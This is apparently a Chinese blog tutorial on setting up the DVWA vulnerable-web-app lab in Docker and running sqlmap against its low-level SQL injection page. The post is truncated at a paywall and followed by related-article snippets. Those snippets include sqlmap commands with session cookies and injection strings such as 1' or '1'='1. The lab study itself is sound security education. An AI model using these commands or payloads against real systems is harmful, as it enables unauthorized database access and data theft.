2019-2-17 dvwa学习-环境搭建和sql字符型注入(级别low)

最新推荐文章于 2025-05-27 17:05:59 发布
原创 最新推荐文章于 2025-05-27 17:05:59 发布 · 7.5k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

1.dvwa环境搭建
因为要学习sqlmap,所以需要搭一个测试环境。
查了网上资料http://www.360doc.com/content/13/0614/22/11029609_292922372.shtml,打算搞个dvwa环境。
DVWA全称是Damn Vulnerable Web Application,它是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
看到一篇介绍DVWA的文章《DVWA中学习PHP常见漏洞及修复方法》,不错。

如果要完全自己搭建,可以参考这篇文章《 一起学安全测试——自己搭建安全测试环境(DVWA)》。
DVWA官网http://www.dvwa.co.uk/,打开速度比较慢,如果要下载可以去https://github.com/ethicalhack3r/DVWA

我是在docker中安装,不需要参考上面的文章,非常简单,这就是docker技术的优势所在。
安装过程

$ docker run -it -p 80:80 vulnerables/web-dvwa
Unable to find image 'vulnerables/web-dvwa:latest' locally
latest: Pulling from vulnerables/web-dvwa
3e17c6eae66c: Pull complete
0c57df616dbf: Pull complete
eb05d18be401: Pull complete
e9968e5981d2: Pull complete
2cd72dba8257: Pull complete
6cff5f35147f: Pull complete
098cffd43466: Pull complete
b3d64a33242d: Pull complete
Digest: sha256:dae203fe11646a86937bf04db0079adef295f426da68a92b40e3b181f337daa7
Status: Downloaded newer image for vulnerables/web-dvwa:latest
[+] Starting mysql...
[ ok ] Starting MariaDB database server: mysqld ..
[+] Starting apache
[....] Starting Apache httpd web server: apache2AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.17.0.2. Set the 'ServerName' directive globally to suppress this message
. ok
==> /var/log/apache2/access.log <==

这样就完成了。apache和mysql已经集成好了,完全不再需要配置。
在浏览器中输入地址 192.168.99.100,可以打开设置界面
在这里插入图片描述
setup.php就是设置界面,注意上面的提示,默认用户名和口令是admin/password。
把网页往下拉
在这里插入图片描述点Create / Reset Database创建dvwa数据库。创建成功后会自动跳转到登录页面。
在这里插入图片描述 输入admin/password,进入dvwa的主界面
在这里插入图片描述至此,环境搭建安装了,总共就花了10分钟。

2.sqlmap练习
sqlmap的安装和配置参见《2019-2-16 sqlmap安装和应用》。有一篇sqlmap介绍文章《Sqlmap中文手册》,可以参考学习。

2-1. sql注入:SQL Injection。包含:找到数据库信息,表信息,数据信息。

我用的是火狐浏览器,先按F12打开开发者工具。
接着在dvwa页面中选择左边导航中的“sql injection”,然后在user id中输入数字“333”,点击submit,此时可以看到如下界面。
在这里插入图片描述HTTP请求有很多种方法,各种方法(GET、POST、cookie和User-Agent等)携带不同参数,合法有效的请求需要携带了特定参数以特定方法发起http请求。Sqlmap运行时除了需要指定目标,有时还需要指定HTTP请求的一些细节。
从上面图片中可以发现,此时http请求采用的是get方法,参数有2个id=333&Submit=Submit。
右下角还显示了cookie信息。

PHPSESSID	j58548g0ejpkr8jo2k4ggjm3f2
security	low

关于cookie,有两种情况sqlmap会用到:

  1. 要测试的页面只有在登录状态下才能访问,登录状态用cookie识别
  2. 想要检测是否存在cookie注入

【step1.列出数据库信息】
开始sqlmap连接,先来个最简单的

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.99.100/vulnerabilities/sqli/?id=333&Submit=Submit#" --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.2.22#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:59:14 /2019-02-17/

[19:59:14] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://192.168.99.100:80/login.php'. Do you want to follow? [Y/n] y
[19:59:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:59:24] [INFO] testing if the target URL content is stable
[19:59:24] [WARNING] GET parameter 'id' does not appear to be dynamic
[19:59:24] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[19:59:24] [INFO] testing for SQL injection on GET parameter 'id'
[19:59:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:59:25] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:59:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:59:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:59:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[19:59:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:59:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:59:26] [INFO] testing 'MySQL inline queries'
[19:59:26] [INFO] testing 'PostgreSQL inline queries'
[19:59:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:59:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:59:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:59:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - com
最低0.47元/天 解锁文章

200万优质内容无限畅学
DVWA------sql注入low)(字符型
qwsn
11-01 1987
================================================================================== 0x01:上low源码 ================================================================================== 0x02sql注入low) 一...
2019-2-26 dvwa学习(3)--sql注入级别highsession
weixin_42555985的博客
02-26 3385
2019-2-26 dvwa学习(3)sql注入级别high 继续把dvwa环境安全级别调整为high 观察界面 high级别页面,点击&amp;amp;quot;here to change your ID&amp;amp;quot;,会打开另外一个网页(session-input.php),然后输入3,提交,在主页面上会显示数据。 我们打开session-input.php的开发者工具,获取cookie 现在尝试按照前面的方式攻击,pos...
sql字符型
qq_41232519的博客
04-28 1145
部分源码如下: $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your...
[问题解决]:Unable to find image ‘containrrr/watchtower:latest‘ locally
最新发布
东皋长歌的专栏
05-27 717
针对Docker部署应用时出现的"Unable to find image"报错,解决方案是配置镜像加速库。具体步骤:1)创建/etc/docker目录;2)新建daemon.json配置文件,添加多个镜像源地址;3)重新加载并重启Docker服务。最后通过docker info验证配置,成功解决问题。该方法通过配置镜像加速源有效解决了因本地镜像缺失导致的部署失败问题。
SQL字符型函数
Just Do IT
03-01 991
1、 ASCII ASCII(American Standard Code for Information Interchange,美国信息交换标准代码)是基于拉丁字母的一套电脑编码系统。 1) 返回与指定字符对应的ASCII码 SQL> select ascii('A') A,ascii('a') "a",ascii('0') zero,ascii(' ') space from du
SQL:字符类型简述
fgx_123456的博客
09-02 3200
char     char是定长的,也就是当你输入的字符小于你指定的数目时,char(8),你输入的字符小于8时,它会再后面补空值。当你输入的字符大于指定的数时,它会截取超出的字符。    nvarchar(n)     包含 n 个字符的可变长度 Unicode 字符数据。n 的值必须介于 1 与 4,000 之间。字节的存储大小是所输入字符个数的两倍。所输入的数据字符长度可以为零。
网络安全-靶机dvwasql注入Low到High详解(含代码分析)
热门推荐
关注网络安全、云原生安全
10-11 3万+
目录 SQL Injection-LOW Union注入 注入点判断 字段判断 获取数据库名 获取表名 获取列名 获取数据 Error注入 获取表名 获取列名 获取数据 源码解析 主要步骤 漏洞原因 SQL Injection-MIDDLE SQL Injection-HIGH SQL Injection(Blind)-LOW Boolean盲注 获取数据库名 sqlmap 获取数据库名 获取表名 获取列名 获取数据 SQL Injection(Blin.
2020-12-06-DVWAsql.md
01-24
- 输入`1'`,服务器返回错误信息:“You have an error in your SQL syntax...”,说明是字符型注入- 使用`1'`闭合字符串,或者使用`1' or '1'='1`进行逻辑判断。 2. **字段数量确定**: - 输入`1' ORDER BY ...
sql注入数字型字符型的原理 //(dvwa实战 sql injection low
weixin_43749051的博客
03-04 1975
1、数字型注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 测试步骤: (1) 加单引号,URL:www.text.com/text.php?id=3’ 对应的sql:select * from table where id=3’ 这时sql语句出错,不符合sql语法,让数据库系统报错,如果没报错就说明 ‘ 被过滤了,这样不存在注入的可能。 (2) 加and 1=1 ,URL:www.text.com/text.php?id=3 and 1=1 对应的sql:select *
SQL SERVER(6)字符型数据类型
复行数十步
04-24 8475
字符型数据是数据库中最常用的数据类型之一,有时人们将其称为字符串。数字、字母、汉字及标点符号都可以称为字符。如果要将字符存放到数据表的字段中,就需要将该字段设置成字符型字符型数据被放在单引号(‘’)中,用于区别其他类型的数据。 数据类型 长度 描述 char 1~8000个字符 固定长度类型。例如,定义数据类型是char(5),那么该类型可以存储5...
SQL数据库基础05-补】常见的数据类型--• 数值类型• 字符类型• 日期类型
学无止境,勤则可达;志存高远,恒亦能成!
06-02 2203
文章目录常见的数据类型一、整型1.1 分类:1.2 特点:1.3 实操:二、小数2.1 分类2.2 特点:2.3 原则三、字符型 char、varchar3.1 类型四、日期型4.1 分类:4.2 特点: 常见的数据类型 数值型: ​ 整型 ​ 小数: ​ 定点数 ​ 浮点数 字符型: ​ 较短的文本:char、varchar ​ 较长的文本:text、blob(较长的二进制数据) 日期型: ​ 一、整型 1.1 分类: tinyint、smallint
iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过
mooyuan的网络安全博客
11-27 1701
打开靶场,url为iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过(1)闭合方式是什么?iwebsec的第7关关卡为数字型,无闭合(2注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的第07关卡过滤了空格。
iwebsec靶场 SQL注入漏洞通关笔记12-等价函数替换绕过
mooyuan的网络安全博客
12-02 1170
总结 SQL注入主要分析几个内容 (1)闭合方式是什么?iwebsec的第12关关卡为数字型,无闭合 (2注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功 (3)是否过滤了关键字?很明显通过源码,iwebsec的第12关卡过滤了等号关键字 了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的等号过滤绕过的SQL注入渗透内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
sqlmap代码
qq_46648283的博客
05-20 7573
Microsoft Windows [版本 10.0.19044.1706] (c) Microsoft Corporation。保留所有权利。 D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2 --current -db ___ __H__ ___ ___[)]_____ ___ ___ {1..
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
weixin_46838716的博客
03-04 1926
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
kaliLinux下docker的安装与dvwa靶场搭建
屿的博客
09-03 9016
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的。补充: -p 80:80 是将容器里的80端口映射到kali的80端口(网站服务)使用docker时,经常需要从官方获取镜像,配置加速器使网络更顺畅。操作系统的机器上,也可以实现。查看docker服务是否开启。中,然后发布到任何流行的。登录进入阿里云容器镜像服务。kali安装docker。修改docker配置文件。docker搭建dvwadvwa已经可以正常访问。配置docker镜像源。docker基础命令。
如何检测mysql注入漏洞_SQL注入漏洞检测
weixin_32027887的博客
01-27 3969
一个度过菜鸟期的后台程序员都会小心的避开SQL注入常见低级错误。除了白盒代码评审,作为第三方的渗透测试,使用sqlmap这样的常用工具进行SQL注入扫描可以降低上述问题发生概率。工具环境准备0.先检查一下是否安装过sqlmap工具,显示下版本sqlmap --version如果运行成功说明已经安装此工具,比如返回1.1.6#pip如果没有安装过sqlmap,请参考后面两个步骤1.安装pip工具多...
iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入
mooyuan的网络安全博客
11-25 2714
iwebsec靶场的SQL注入关卡共13关SQL注入漏洞,覆盖了数字型注入字符型注入、报错型盲注、布尔型盲注、时间型盲注以及各种过滤绕过的注入,外加上二次注入,是SQL注入知识点覆盖较为全面的一个靶场。SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第一关关卡为数字型,无闭合(2注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的数字型关卡无过滤任何信息。
web渗透测试实战-SQLMAP
c_lanxiaofang的博客
05-26 8855
一、实验项目名称 web渗透测试实战-SQLMAP 二、实验目的及要求 熟悉SQL注入漏洞原理 熟悉SQLMAP工具使用。 1、获取数据库信息:数据库漏洞、数据库名、数据库版本等 python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51"
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值